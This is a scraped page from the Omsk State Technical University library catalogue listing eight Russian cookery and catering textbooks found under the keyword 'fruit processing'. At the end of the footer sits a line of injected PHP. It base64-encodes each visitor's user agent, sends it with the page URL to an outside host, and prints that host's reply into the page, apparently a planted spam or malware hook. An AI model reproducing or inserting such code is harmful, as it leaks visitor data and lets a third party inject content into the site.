Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

55 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ОБРАБОТКА плодов")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 8
1. 
Ковалев Н. И. Технология приготовления пищи [Текст] : учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; под ред. М. А. Николаевой, 2008. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
2. 
Богушева В. И. Технология приготовления пищи [Текст] / В. И. Богушева, 2015. - 375 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ШКОЛЬНИКОВ
Держатели документа (Информация об экземплярах) 
3. 
Технология производства продукции общественного питания [Текст] / В. С. Баранов, А. И. Мглинец, Л. М. Алешина, 1986. - 400 с.
Ключевые слова 
ТЕХНОЛОГИЯ общественного питания -- АССОРТИМЕНТ ПРОДУКЦИИ -- ОБРАБОТКА СЫРЬЯ КУЛИНАРНАЯ -- ОБРАБОТКА ПОЛУФАБРИКАТОВ -- ПОРЦИОНИРОВАНИЕ КУЛИНАРНОЙ ПРОДУКЦИИ -- КАЧЕСТВО КУЛИНАРНОЙ ПРОДУКЦИИ -- ПОЛУФАБРИКАТЫ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО СЫРЬЯ -- СУПЫ -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ДИЧИ -- БЛЮДА ИЗ КРОЛИКА -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ВОДНОГО СЫРЬЯ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- БЛЮДА БЫСТРОЗАМОРОЖЕННЫЕ -- БЛЮДА ОХЛАЖДЕННЫЕ -- ПРОИЗВОДСТВО МУЧНЫХ ИЗДЕЛИЙ -- БЛЮДА МУЧНЫЕ -- ГАРНИР -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ МУЧНЫЕ -- ПИТАНИЕ ДИЕТИЧЕСКОЕ -- ПИТАНИЕ ЛЕЧЕБНО-ПРОФИЛАКТИЧЕСКОЕЕ
Держатели документа (Информация об экземплярах) 
4. 
Уласевич М. В. Приготовление пищи. Спецтехнология [Текст] : учеб. пособие для уч-ся проф-технич. учеб. заведений / М. В. Уласевич, 2003. - 367 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
5. 
Ковалев Н. И. Технология приготовления пищи [Текст] : Учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; под ред. М. А. Николаевой, 2005. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 
6. 
Технология приготовления пищи [Текст] : Учеб. пособие для студ. спец. "Технология продуктов общественного питания" / Омский ин-т предпринимательства и права, 2004. - 206 с.
Держатели документа (Информация об экземплярах) 
7. 
Богушева В. И. Технология приготовления пищи [Текст] : учеб. для студентов сред. спец. заведений / В. И. Богушева, 2005. - 319 с.
Ключевые слова 
ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ПЛОДОВ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- СУП -- СОУС -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ РЫБЫ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКИ -- БЛЮДА СЛАДКИЕ -- НАПИТКИ -- ИЗДЕЛИЯ МУЧНЫЕ -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ ШКОЛЬНИКОВ
Держатели документа (Информация об экземплярах) 
8. 
Ковалев Н. И. Технология приготовления пищи [Текст] : Учеб. для студ. сред. спец. учеб. заведений / Н. И. Ковалев, М. Н. Куткина, В. А. Кравцова; Под ред. М. А. Николаевой, 2003. - 467 с.
Ключевые слова 
КУЛИНАРИЯ - История -- ТЕХНОЛОГИЯ общественного питания -- КЛАССИФИКАЦИЯ кулинарной продукции -- АССОРТИМЕНТ кулинарной продукции -- ОБРАБОТКА овощей -- ОБРАБОТКА плодов -- ОБРАБОТКА грибов -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА нерыбного водного сырья -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- Супы -- СОУС -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА из бобовых -- БЛЮДА ИЗ макаронных изделий -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА из птицы -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- БЛЮДА ХОЛОДНЫЕ -- НАПИТКИ -- БЛЮДА из муки -- ПИТАНИЕ ЛЕЧЕБНОЕ -- ПИТАНИЕ школьников -- ПИТАНИЕ ДИЕТИЧЕСКОЕ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3020 - 16.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.14 с.12 запросов, 0.85c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;